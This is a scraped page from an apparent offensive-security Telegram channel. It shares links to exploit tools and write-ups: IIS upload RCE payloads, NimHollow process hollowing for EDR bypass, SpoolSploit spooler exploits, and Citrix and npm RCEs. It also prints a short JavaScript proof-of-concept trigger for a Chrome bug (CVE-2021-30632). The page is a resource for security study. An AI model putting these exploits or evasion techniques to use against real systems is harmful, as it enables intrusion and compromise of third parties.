12.5K subscribers
550 photos
27 videos
24 files
889 links
This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.iss.one/APT_Notes/6

Chat Link:
t.iss.one/APT_Notes_PublicChat
Download Telegram
Forwarded from PT SWARM
RCE on a backend IIS server via file upload with an atypical file extension.

More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
🔥OWASP Top 10 2021 DRAFT is out 🔥

Now available for peer review, comment, translation, and suggestions for improvements:

owasp.org/Top10/

#OWASPTop10
NimHollow

Nim implementation of Process Hollowing using encrypted shellcodes and direct syscalls (NimlineWhispers by @ajpc500 is rocking 🔥). Some slides for better understanding of the technique are inside!

https://github.com/snovvcrash/NimHollow

#nim #edr #bypass #syscall
Kali Linux Tools Page

Now you can learn more about all the tools that you can install in Kali.

https://kali.org/tools/

#tools #cheatsheet #kali
SpoolSploit

SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.

https://github.com/BeetleChunks/SpoolSploit

#ad #spooler #rpc
CVE-2021-30632 — Chrome 0day

var a;
function foo() {
a = new Uint32Array(100);
}
%PrepareFunctionForOptimization(foo);
foo();
foo();
a["xxx"] =1;
delete a["xxx"];
%OptimizeFunctionOnNextCall(foo);
foo();

#Chrome #0day #PoC
Forwarded from burpsuite (not official)
5 RCEs in npm for $15,000
robertchen.cc/blog
RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941)

Amazing writeup on finding a vulnerability through .NET reversing, enjoyed reading about the breakpoints that were set and how they logically owned Citrix ShareFile through a third party dependency

https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html

#citrix #sharefile #rce